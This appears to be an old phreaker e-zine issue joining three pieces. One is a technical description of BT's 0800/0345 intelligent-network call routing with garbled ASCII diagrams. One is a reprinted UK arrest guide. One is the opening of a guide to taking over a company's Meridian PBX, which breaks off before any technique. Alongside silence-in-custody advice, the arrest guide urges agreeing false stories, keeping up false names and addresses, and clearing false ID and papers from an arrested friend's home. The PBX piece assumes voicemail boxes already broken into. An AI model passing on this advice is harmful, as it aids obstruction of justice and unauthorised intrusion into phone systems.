situations. (CommandLink)

CALL ROUTING PLANS
==================
The true power of intelligent network call processing is not solely
its list of advanced features, but combinations of the feature set which
can be defined to meet a service provider's own unique telecommunications
needs and, consequently, buisness requirements. An example of a simple call
routing plan is shown in Figure 6. The data defining the call treatment(s)
for a service provider are held in the NCP database in a service provider
record.


Figure 6 : Combining service features

DIAL PULSE ÜÜÜÜÜÜÜÜ
NO RESPONSE ß ÜÜÜÜ ß
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÛ°°Û
³ OPERATOR
SELECTLINK ³
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ³
º "KEY 1 FOR COMMERCIAL LOANS, º ³ ÜÜÜÜÜÜÜÜ
º KEY 2 FOR CONSUMER LOANS..." º ³ DIGIT #1 ß ÜÜÜÜ ß
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÑÍÍͼ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÛ°°Û
³ COMMERCIAL
À Ä ³ LOANS
³ ³
DAYLINK AREALINK ÚÁÄÄÁÄÄÄÄ¿ ÜÜÜÜÜÜÜÜ
ÚÄÄÄÄÄÄ¿ MON - FRI ÚÄÄÄÄÄÄÄ¿ LONDON ³ WHAT ³ DIGIT #2 ß ÜÜÜÜ ß
ÄÄÄ>ÄÄÄ´ WHAT ÃÄÄÄÄÄÄÄÄÄÄÄ´ WHAT ÃÄÄÄÄÄÄÄÄ´ MF ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÛ°°Û
³ DAY? ³ ³ AREA? ³ ³ DIGIT? ³ CONSUMER
ÀÄÄÂÄÄÄÙ ÀÄÄÂÄÄÄÄÙ ÀÄÄÄÂÄÄÄÄÙ LOANS
³ ³ ³
³ ³ ³
³ ³ ³ ÜÜÜÜÜÜÜÜ
³ ³ ³ DIGIT #3 ß ÜÜÜÜ ß
³ ³ ALL ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÛ°°Û
³ ³ OTHER OTHER
³ ³
³ ³
³ ³
³ ³ ÜÜÜÜÜÜÜÜ
³ ³ ß ÜÜÜÜ ß
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÛ°°Û
³ BRISTOL
³ BRANCH
³
³ SATURDAY
³ AND ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
³ SUNDAY º "ALL OFFICES ARE º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ CLOSED FOR THE º
º WEEKEND..." º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
COURTESYLINK


SERVICE ADMINISTRATION
======================
Service Administration for Advanced LinkLine features is handled
by the network subscriber transaction, administration and recording system
(NETSTAR), which has on-line access to the NCPs. NETSTAR provides user
friendly access to the NCP advanced feature database to modify, create or
delete service provider call routing plans via dedicated or dialup/dialback
links to VDUs. An NCP can have only one active call routing plan for any
service provider number, but additional plans may be prepared and held in
NETSTAR for transmission to, and activation at, the NCP when required.
NETSTAR holds security backup copies of all call routing plans and NCP
operating parameters.

CALL PROCESSING
===============

Derivation of the Calling Subscriber Geography (CSG)
----------------------------------------------------
All 0800 and 0345 calls are routed via a DMSU to a DDSN action control
point (ACP) (Figure 7). During Call set-up, the ACP requests additional
set-up information to be sent via the C7BT Link. This cause the calling
line identity (CLI) to be forwarded from the first exchange in the call
path with C7BT signalling.

Figure 7 : Access to the Digital Derived Services Network



PSTN DDSN
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄ¿
³ DLE ÃÄÄÄÄC7BTÄÄÄ´ ÃÄÄÄÄC7BTÄÄÄ´ ÃÄÄÄÄC7BTÄÄÄ´ ³
³ or ³ ³ DMSU ³ ³ 5ESS-PRX ³ ³ 5ESS-PRX ³
³ E-ALE ÃÄTÄTÄTÄTÄTÄ´ ÃÄTÄTÄTÄTÄTÄ´ (ACP) ÃÄTÄTÄTÄTÄTÄ´ (ACP) ³
ÀÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄ´ ³ ³ ³ ³ ³
ÚÄÄÄÄÄÄÄ¿ ³ ÀÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÂÄÄÄÄÄÙ ÀÄÄÄÄÂÄÄÄÄÄÙ
³ AMSU/ ÃÄÙ ³ ³
³ +ALE ³ ³ ³
ÀÄÄÄÄÄÄÄÙ ³ ³
Á Á
SP SP

* ALE may be via a digital concentrator centre exchange
E-ALE : Enhanced analogue Local Exchange (C7BT signalling capability)


If a call is originated from a local exchange with C7BT signalling,
a full calling line identity (FCLI) is returned to the ACP. The FCLI
includes the caller's national number group (NNG) code, or all figure
numbering (AFN) code in the case of a director area.

If the call is originated from an analogue local exchange (ALE),
then a partial calling line identity (PCLI) is derived by the first
digital exchange in the call path. This will normally be a DMSU, but in
cases where an ALE is parented on a digital concentrator centre exchange
(DCCE), the DCCE generates the PCLI. A PCLI must comprise sufficient
information to uniquely identify the digital entry point to the PSTN
used by that ALE. This information includes the region, area and unit
identity portions of the network nodal identity plus the telephony process
number and route numbers used by the call processing software of the
digital exchange.

Whe a PCLI or FCLI is received by a DDSN action control point, the
call processing software searches through a set of look-up tables for a
comparison with the CLI sent. This search will result in the calling
subscriber geography (CSG) being identified.

Figures 8 and 9 illustrate the CLI and CSG derivation process.

Figure 8 : CLI derivation


ÚÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ DLE ÃÄ<ÄÄÄÄÄÄÄÄÄ¿ DMSU ³ ³ 5ESS-PRX ÃÄÄÄÄÄÄÄÄÄ´ 5ESS-PRX ³
³ E-ALE ³ ³ ³ ³ ³ (ACP) ³ ³ (ACP) ³
ÀÄÄÄÄÄÄÄÙ ³ ³ ³ ³ ³ ³ ³
³ ÃÄÄÄÄÄÄÄÄÄÄÄÄ<ÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ³ ³
³ ³ ³ ³ ³ ³ ³ ³
ÚÄÄÄÄÄÄÄ¿ ³ ³ ³ ³ REQUEST ³ ³ ³
³ ALE ³ ?ÄÄÄÄÄÄÄÄÄÙ ³ ³ CLI ³ ³ ³
ÀÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ


Figure 9 : CSG derivation


ÚÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ FCLI ÄÄÄ>ÄÄÄÄÄÄÄÄÄ¿ DMSU ³ ³ 5ESS-PRX ÃÄÄÄÄÄÄÄÄÄ´ 5ESS-PRX ³
³ DLE ³ ³ ³ ³ ³ (ACP) ³ ³ (ACP) ³
ÀÄÄÄÄÄÄÄÙ ³ ³ ³ FCLI ³ ³ ³ ³
³ ÃÄÄÄÄÄÄÄÄÄÄÄÄ>ÄÄÄÄÄÄÄÄCLI/CSG ³ ³ ³
³ ³ ³ PCLI ³ TABLES ³ ³ ³
ÚÄÄÄÄÄÄÄ¿ ³ ³ ³ ³ ³ ³ ³ ³
³ ALE ³PCLIÄ>ÄÄÄÄÄÙ ³ ³ CSG ³ ³ ³
ÀÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ


Global Title Translation
------------------------
Call processing for service providers with basic features is handled
within the DDSN switching nodes. To differentiate between calls to SPs with
advanced and basic features, the ACP checks for the existence of a
translation for the number dialled. If a translation exists, the call is
routed to the specified network termination. If the translation does not
exist, call handling instructions are returned from the NCP database in
response to a query message from the originating ACP. A number of query
messages are neccesary for some types of call; the initial query is therefore
termed QRY1. The process is illustrated in Figures 10 and 11.


Figure 10 : DDSN ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
Intelligent Network call ³ INCOMING CALL ³
Processing (Call not ³ FROM PSTN ³
requiring NSC and no ³ DIGITS RECEIVED ³
network controls active) ³ AT ORIGINATING ³ ( OR (0) 345 DEFGHJ )
³ ACP ³
³ (0)800 345800 ³
ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÙ
GTT : GLOBAL ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄ¿
TITLE ³ ACP REQUESTS ³
TRANSLATION ³ ADDITIONAL ³ ( SEE FIGURE 8 )
³ SET-UP INFO ³
³ VIA C7BT LINK ³
ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄ¿
³ FCLI OR PCLI ³ ( SEE FIGURE 8 )
³ FORWARDED TO ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ACP ³ ³ ORIGINATING ACP ³
ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÙ ³ DEALS. ³
ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄ¿ YES ³ CALL SETUP ³
³ TRANSLATION HELDÃÄÄÄÄÄÄ>ÄÄÄÄÄ´ NORMALLY USING ³
³ AT ACP ³ ³ C7BT LINK ³
ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
 NO ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
NO ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄ¿ YES ³ SEND QRY1 ³
ÚÄÄÄÄÄÄÄÄÄÄÄ<ÄÄÄ´ IS 0800-345 ÃÄÄÄ>ÄÄÄÄÄÄÄÄ´ MESSAGE TO NCP ³
³ ³ DEFINED IN GTT? ³ ³ VIA C7NA ³
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ LINK ³
 ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÙ
³ ³ SEND A FINAL ³ ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄ¿
³ ³ TREATMENT OF ³ NO ³ IS A PLAN HELD ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´'VACANT CODE' TO ÃÄÄÄÄÄ<ÄÄÄÄÄÄ´ AT NCP FOR 800 ³
³ ³ ACP ³ ³ 345800? ³
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÙ
³  YES
 ÚÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄ¿
³ ³ NCP DETERMINES ³
³ ³ CALL TREATMENT. ³
ÚÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ BILLING AND ROUTING ³
³ 'VACANT CODE' ³ ³ DETAILS TO ACP ³
³ NUMBER UNOBTAINABLE TONE ³ ³ VIA C7NA ³
³ RETURNED ³ ÀÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÙ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄ¿
³ ORIGINATING NCP ³
³ SETS UP CALL USING ³
³ C7BT LINK ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Figure 11 : ACP Communication with NCP

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ (ACP 1) ³
³ TRANSLATION ³
³ NOT HELD ³
³ Ä ³
³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 0800 DEF ³ ³ NCP ³
³ IN GTT ³ ÃÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ = ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ C ³ ÚÄÄÄÄÄÄÄÄÄ¿³
³ ³ ³ (ACP 2) ÚÄÄÄ´ ³ N ³ ³ SP ³³
³ SEND QRY1 ÄÄ>ÄÄÄC7NAÄÄÄ>ÄÄÄÄÄÄÄÄÄÄÄÄÄ´ S ÃÄ>ÄC7NAÄ>ÄÄÄ´ I Ã>Ä´ RECORD ³³
³ TO NCP ³ ³ ³ T ³ ³ R ³ ÀÄÄÄÄÂÄÄÄÄÙ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ ³ E ³ ³ I ³ ³ ³
³ BILLING ÄÄ<ÄÄÄC7NAÄÄÄ<ÄÄÄÄÄÄÄÄÄÄÄÄÄ´ P ÃÄ<ÄC7NAÄ<ÄÄÄ´ N Ã<ÄÄÄÄÄÄÙ ³
³ INSTRUCTIONS³ ÀÄÄÄÄÄÄÄÄÄÁÄÄÄÙ ³ G ³ PROCESSOR ³
³ + ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÀÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
³ ROUTE ³ ³ (ACP n) ³
³ MESSAGE ³ ³ CALL SET-UP ³
³ OR ³ ³COMPLETED TO ³
³ FINAL ÄÄÄÄÄÄÄC7BTÄÄÄÄÄÄÄ´ SERVICE ÃÄÄÄÄÄÄÄÄÄÄÄÄ SP
³ TREATMENT ³ ³ PROVIDER ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ


ACP 1 = ACP receiving call from PSTN
ACP 2 = ACP with directly connected NCP
ACP n = The ACP on which the SP is terminated


The QRY1 message includes:

a) 10 digit dialled number, which excludes any leading 0 but includes a
trailing 0 as padding if only 9 digits long.

b) Calling subscriber geography (CSG).

c) The ACP which originated the query. This is used to reference a table
in the NCP which defines the capabilities of the ACP,; for example,
whether it has an NSC.

d) The destination of the query.

The route message includes a network code of up to 10 digits which is used
by the ACP to route the call to its destination. This is normally a service
provider (SP) line, but can be an NSC announcement.

A final treatment command is sent to the ACP when the NCP cannot
route a call normally. The final treatment command results in either a tone
or an announcement being returned to the caller.

Calls Requiring an NSC
----------------------
As not all ACPs are hosts to an NSC, a call which requires an NSC at
some point during the call treatment must be setup in two parts. After the
QRY1 Message, the call is routed to an ACP/HOST, using C7BT in the normal
manner, where a voice trunk to the NSC is allocated. This action is termed
a 'service assist' if the NSC is required as intermediate step in the call
treatment (SelectLink) or a 'hand-off' if the NSC is required to play an
announcement as the final routing conclusion (CourtesyLink). During a
service assist or a hand-off, the ACP/HOST then queries the NCP a second
time (QRY2) with details of the NCP and call number used for the QRY1
message. The call treatment now continues with a list of commands being sent
from the NCP to the NSC. This could be to play an announcement and collect
digits from the caller. NCP/NSC communication takes place via the C7NA
links with any digits collected being returned to the NCP to determine the
final disposition of the call.

CALL LOGGING
============
In response to a query message from the originating ACP, the NCP
returns a billing command instructing the ACP what details to record;
the ACP acknowledges receipt of the instructions to the NCP. On answer,
the terminating exchange sends a message to the originating ACP giving
either 'answer / no charge' or 'answer / charge' depending on which LinkLine
(0800/0345) is defined. On Call termination, the ACP records the details
of the call in an automatic message accounting (AMA) record.

The originating ACP normally controls the call and is responsible
for generating an automatic message accounting record. These records are
periodically polled by an on-line data collector which validates them
before passing them to an off-line charge raising system which calculates
call charges in preparation for the production of the service provider's
bill. Where a 'hand-off' has occurred, the ACP/HOST takes over control
of the call for supervisory and logging purposes.

OPERATIONS AND MAINTENNANCE
===========================
The Multi-Function Operations System (MFOS) is central to the
operations and maintennance fucntions for the DDSN intelligent network.
These functions include:

o On-line access to the ACPs/NCPs/NSCs
o Alarm Collection and Monitoring
o Collection and analysis of traffic data
o Real time Network management

Connection between the multi-function operations system processors, the
network elements and the users is achieved using a virtual circuit switch
for flexibility.

///// ///// ///// ///// ///// ///// ///// ///// ///// /////

.
:
|
+-+[ being arrested in th uk ]+---> by bodie <-------------------------------+
+-+[ D4RKCYDE ]+---> bodi3@usa.net <--------------------------+
|
:
.
NO COMMENT - A DEFENDENTS GUIDE TO ARREST
Reprinted from booklet by AK Disrtibution
by Bodie - <Bodi3@usa.net>

******
This information is primaraly based on the english legal system. Although
most of the information is valid for other countries including the US
******

GETTING ARRESTED IS NO JOKE

It's a serious business. All convictions add up: eg, if your arrested 3 times
for shoplifting, you stand a good chance of getting sent down. If theres a
chance of you getting nicked, get your act together: know what to do in case
you're arrested. Unless you enjoy cells, courtrooms and prisons, you owe it
to yourself to wise up.

WHEN YOU HAVE BEEN ARRESTED

You have to give the police your NAME, ADDRESS and your DATE OF BIRTH. They
also have the right to take your fingerprints and other non-intermate body
samples. The Criminal Justice and Public Order Act 1994 has now removed the
traditional 'Right to Silence' (from April 10th 1995). Howver, all this
means is that the police/prosecution can point to your refusal to speek to
them when the case comes to court, and the court MAY take this as evidence
of your guilt. THE POLICE CAN NOT FORCE YOU TO SPEEK OR MAKE A STATEMENT,
WHATEVER THEY SAY TO YOU IN THE STATION. Refusing to speek cannot be used
to convict you by itself.

It's yet to be seen how the police will use this change in the law but we
reckon the best policy IF YOU WANT TO GET OFF is to REMAIN SILENT. The best
place to work out a good defence is afterwards, with your solicitor or
witnesses, not under pressure in the hands of the cops. If yout refusal to
speek comes up in court, the best defence we think is to refuse to speek
until your solicitor gets there, then get them to agree your position. You
can then say you acted on legal advice. KEEPING SILENT IS STILL THE BEST
THING TO DO IN POLICE CUSTODY.

REMEMBER: ALL CHARGES ADD UP.

Q: WHAT HAPPENS WHEN I GET ARRESTED?
When you are arrested, you will be taken to a police station, you will be
asked your name, address and date of birth. Your personal belongings will
be taken from you. These are listed on the custardy record and usually you
will be asked to sign that the list is correct. You should sign immediately
below the last item, so the cops can't add something incriminating to the
list. You should also refuse to for something which isn't yours, or which
could be incriminating. You will then be placed in a cell until the police
are ready to deal with you

Q: WHEN CAN I CONTACT A SOLICITOR?
You should be able to ring a solicitor as soon as you've been arrested.
Once at the police station it is once of the first things you should do, for
two reasons:
1. To have someone know where you are
2. To show the cops you are not going to be a soft target, they may back off
a bit.

It is advisable to avoid using the duty solicitor as they are often either
crap or hand in glove with the cops. It's worth finding the number of a
good solicitor in your area and memorising it. The police are wary of
decent solicitors. Also avoid telling your solicitor exactly what happened:
this can be sorted out later. For the time being, tell him you are refusing
to speek. Your solicitor can come into the police station while the police
interview you: you should refuse to be interviewed unless your solicitor is
present.

Q. WHAT IS AN INTERVIEW
An interview is the police questioning you about the offences they want to
charge you with. The interview will usually take place in an interview room
in the police station. An interview is only of benefit to the police.
Remember they want to prosecute you for whatever charges they can stick on
you.
THE INTERVIEW IS A NO WIN SITUATION. For your benefit the only thing to be
said in an interview is 'No Comment'
Remember: THEN CAN'T LEGALLY FORCE YOU TO SPEEK

Q: WHY DO THE POLICE WANT ME TO ANSWER QUESTIONS?
IF THE POLICE THINK THEY HAVE ENOUGH EVIDENCE AGAINST YOU THEY WILL NOT NEED
TO INTERVIEW YOU. eg, in most public order arrests they rely on witness
statements from 1 or 2 cops or bystanders, you won't even be interviewed. The
police want to convict as many people as possible because:
1. They want to convict you because it makes it look like they're doing a
good job at solving crime. The 'clear-up rate' is very important to the cops,
they have to be seen to be doing their job. The more crimes they get
convictions for, the better it looks for them.
2. Police officers want promotion, to climb the ladder of hierarchy. Coppers
get promotion through the number of crimes they 'solve'. No copper wants to
be a bobby all their life.
A 'solved crime' is a conviction against somebody. You only have to look at
such cases as the Birmingham 6 to understand how far the police will go to
get a conviction. Fitting people up to boost the 'clear-up rate' and at the
same time removing people the cops don't like is a widespread part of all
police forces.

Q: SO IF THE POLICE WANT TO INTERVIEW ME, IT SHOWS I COULD BE IN A GOOD
POSITION?
Yes, they may not have enough evidence, and hope you'll implicate yourself
or other people

Q: AND THE WAY TO STAY IN THAT POSITION IS TO REFUSE TO BE DRAWN INTO A
CONVERSATION AND ANSWER "NO COMMENT" TO ANY QUESTIONS?
Exactly

Q: BUT WHAT IF THE EVIDECE LOOKS LIKE THEY HAVE GOT SOMETHING ON ME?
WOULDN'T IT BE BEST TO EXPLAIN AWAY THE CIRCUMSTANCES I WAS ARRESTED IN, SO
THEY'LL LET ME GO?
The only evidence that matters is the evidence presented in court to the
magistrate or judge. The only place to explain everything is in court. If
they've decided to keep you in, no ammount of explaining will get you out.
If the police have enough evidence, anything you say can only add to the
evidence against you.
When the cops interview someone, they do all they can to confuse and
intimidate you. The questions may not be related to the crime. Their aim
is to soften you up, get you chatting. Don't answer a few small talk
questions and then clam up when they ask you a question about the crime.
It looks worse in court.

To prosecute you, the police must present their evidece to the Crown
Prosecution Service. A copy of the evidence will be sent to your solicitor.
The evidence usually rests on very small points: this is why it's important
not to give anything away in custody. If they don't have enough evidence
the case could be thrown out of court or never even get to court.
This is why they want you to speek. They need all the evidence they can get.
One word could cause you a lot of trouble.

Q: SO I'VE GOT TO KEEP MY MOUTH SHUT. WHAT TRICKS CAN I EXPECT THE POLICE
TO PULL IN ORDER TO MAKE ME TALK?
The police try to get people to talk in many devious ways. The following
four pages show some pretty common examples, but remember they may try some
other line on you.

THESE ARE THINGS THAT OFTEN CATCH PEOPLE OUT
DON'T GET CAUGHT OUT

1: "Come on now, we know it's you, your mate's in the next cell and he's
told us the whole story"

(If they've got the story, why do they need your confession? Plauing
co-accused off against each other is a common trick as you have no way of
checking what the other person is saying. If you are up to something dodgy
with other people, work out a story and stick to it. Plus you can't be
convicted just on the word of a co-accused.)


2: "We know it's not you, but we know you know who's done it. Come on Jane,
don't be silly, tell us who done it"
---
(The cops will use your first name to try and seem as though they're your
friends. If you are young they will act in a fartherly/motherly way, etc.)


3: "As soon as we find out what happened you can go"

(Fat chance)


4: "Look you little bastard. don't fuck us about. We've dealt with some
characters, a little runt like you is nothing to us. We know you did it,
you little shit and your going to tell us"


5: "Whats a nice kid like you doing messed up in a thing like this?"

(They're trying to get at you)


6: "We'll keep you in till you tell us"

(Unless they charge you with a 'serious offence' they have to release you
within 24 hours. Even if you are suspected of a 'serious offence' you have
the right to a solicitor after 36 hours, and only a magistrate can order you
to be heald without charge for longer)


7: "You'll be charged with something far more serious if you don't answer
our questions, sonny. You're for the high jump. Your not going to see the
light of day for a long time. Start answering our questions cos we're
getting sick of you"

(Mental intimidation. They're unlikely to charge you with a serious offence
that won't stick in court. Don't panic)

8: "My niece is a bit of a rebel"


9: "If someone's granny gets mugged tonight it'll be your fault. Stop
wasteing our time by not talking"

(They're trying to make you feel guilty. Don't fall for it - did you ask to
be nicked or interviewed?)


10: Mr Nice: "Hiya, whats it all about then? Sergent Smith says your in a
bit of trouble. He's a bit wound up with you. You tell me what happened
and Smith won't bother you. He's not the best of our officers, he loses his
rag every now and again. So what happened?"

(Mr Nice is as devious as Mr Nasty. He or she will offer you a cuppa,
cigarettes, a blanket. It's the softly-softly approach. It's bollocks.
'No Comment')


11: "We've been here for half an hour now and you've not said a fucking
word. Look you little cunt, some of the CID boys will be down in a minute.
They'll have you talking in no time. Talk now or i'll bring then down"

(Keep at it, they're getting desperate. They're about to give up. You've
got a lot to lose by speaking)


12: "Your girlfriend's outside. Do you want us to arrest her? We'll soon
have her gear off for a strip search. I bet she'll tell us. You're making
all this happen by being such a prick. Now Talk"

(They pick on weak spots, family, friends, etc. Gerry Conlon of the
guildford 4 was told that his mother would be shot by the RUC unless he
confessed. Cops sometimes do victimise prisoners families, but mostly
they're bluffing)


13: "You're a fucking loony you! Who'd want you for a mother, you daft
bitch? Confess or your kids are going into care"


14: "Look, we've tried to contact your solicitor, but we can't get hold of
them. It's going to drag on for an ages this way. Why don't you use one of
our duty solicitors, and we'll soon get this situation cleared up so you can
go home"

(Never accept an interview without your solicitor present, and don't make a
statement even if your solicitor advises you to - a good one won't)


15: "You're obviously no dummy. I'll tell you what, we'll do a deal. You
admit to one of the charges and we'll drop the other two. You admit to it
and we'll recoment to the judge you get a non-castodial sentence, because
you've co-operated. How does that sound?"

(They're trying to get you to do a deal. There are no deals to be made with
the police. This bloke got sent down for not paying a fine. The prisoner
he was hand-cuffed to in the prison bus did a deal with the police. He
pleaded guilty to a charge after being promised a non-castodial sentence.
The man trusted the police, he was a small-time businessman accused of
fraud. When it came to court, the judge gave him two years, the bloke was
speechless)


16: "We've been round to the address you gave and the people there say they
don't know you. We've checked up on the DSS computer and theres no sign of
you. Now come on, tell us who you are. Wasteing police time is a very
serious offence. Now tell us who you are or you've had it"

(If you've sorted out a false address with someone, make sure they're
reliable, and everyone in the place knows the name you're using. Stick at
it, if you're confident. You can't be charged for wasteing police time for
not answering questions)


17: "They've abolished the right to silence - you have to tell us everything
now, it's the law"

(As we said at the beginning, you can still say nothing, there is no
obligation to tell the cops anything beyond your name, address and date of
birth)

---
If you are nicked on very serious charges, or for serious violence to a
police officer, the cops may rough you up or use violence and torture to get
a confession (true or false) out if you. Many of the people freed after
being fitted up by the West Midlands Serious Crime Squad or comming to light
now in manchester, were physically abused till they admitted to things they
hadn't done. If this happens, obviously it's your decision to speek rather
than face serious injury, but remember, what you say could land you inside
for a long time, even if it's not true. Don't rely on retracting a
confession in court - it's hard to back down once you've said something.

In the police station the cops rely on peoples naivety. If you are sussed
the chances are they'll give up on you. In these examples we have tried to
show how they'll needle you to speek. Thats why you have to know what to do
when you're arrested. The hassle in the copshop, but if you are on the
ball, you can get off. You have to be prepared. We've had a lot of
experience with the police and we simply say:

1: Keep calm and cool when arrested (remember you are on their home ground)
2: Get a solicitor
3: Never make a statement
4: Don't get drawn into conversations with the police
5: If they rough you up, see a doctor immediately after being released. Get
a written report of all bruising and marking. Remember the officers names
and numbers if possible

Having said nothing in the police station, you can then look at the evidence
and work out you alibi, your side of the story.
THIS IS HOW YOU WILL GET OFF

REMEMBER:
An interview is a no-win situation. You are not abliged to speek. If the
police want to interview you, it shows you're in a good position...

...And the only way to stay in that position is to refuse to be drawn into
any conversation and answer "NO COMMENT" to any questions


Q: WHAT CAN I DO IF ONE OF MY FRIENDS IS ARRESTED?
If someone you know is arrested there's a lot you can do to help them from
the outside.

1. If you know what name they are using as soon as you think they've been
arrested, ring the police station. Ask whether they are being held there
and on what charges
2. Inform a decent solicitor
3. Remove anything from the arrested persons house that the police may find
interesting: letters, address books, false ID, etc, incase the police raid
the place
4. Take food, cigarettes, etc, into the police station for your arrested
friend. BUT don't go into enquire at the police station to ask about a
prisoner if you run the risk of arrest yourself. You'll only get arrested.

The police have been known to lay off a prisoner if they have visible
support from the outside. It's solidarity which keeps prisoners in good
spirits.

SUPPORT PRISONERS
.
:
|
+-+[ meridian security audit /switch hacking ]+---> by hybrid <--------------+
+-+[ D4RKCYDE ]+---> hybrid@dtmf.org <--------+
|
:
.


. .. ... .......... BL4CKM1LK teleph0nics .......... ... .. .
. .. ... .......... http://hybrid.dtmf.org ......... ... .. .


Meridian I Switch and Trunk Interception.......... ..... ... .
An account of how an ENTIRE companys PBX.......... ..... ... .
can be taken over (The hardcore phreak way)....... ..... ... .
by hybrid <hybrid@dtmf.org hybrid@ninex.com>...... ..... ... .


Hi. I'm not going to write a mad big introduction to this article, because
I dont feel their is a need for one. All I want to say here is that this
article is intended for the more "hardcore" phreak, yes, hardcore phreak, not
for lame ass calling card leeching kiddies who call themsleves phreaks. If
you are intersted in hacking telephony switches, and you have prior/prefixed
knowledge of Meridian, read on..

Through my experience, I've seen alot of meridian admins go through many
different and sometimes repetitive lengths to supposidly secure an internal
PSTN connected PABX. In this article I'm going to share my knowledge of
PBX switch hacking, and enlighten you to the intricate techneques that can
be used to "trunk hop" etc. The information provided in this article has been
obtained from my own personal accounts of hacking telephony switches, which
I'd like to state, I don't participate in anymore.

Now, for the sake of timesaving, I'll setup a possible scenario.. Consider
the following:

o You have stumbled accross a nice Meridian Mail system, which you
have already compromised by finding yourself a few boxdes in their.
You discover that the Meridian Mail system you have gained access
to belongs to a certain telco, and is used for internal
communication between emloyees high up in the hierarchial chain.

Now, any "normal" phreak would gradually take over the system by finding as
many free boxes as possible and hnading them over to friends, or would keep
the nice lil' system to themselves as a means of obtaining information about
the telco that owns the PBX, via the the means of eavesdroping on used
voicemail boxes. This is a very primitive form of remote eavesdroping, which
this file is not designed to illistrate.

Meridian PBX systems are all administered by a primary system console, which
can be remotely accessed by many different protocols. The most popular of
which is remote dialup via assigned extensions. If the companys main switch
is centrex based, it is likely that the meridian admin console is accessable
via IP on the companys intranet. If you manage to gain access to the
actual switching conponment, you are likely to have the following privalges
on the meridian based network:

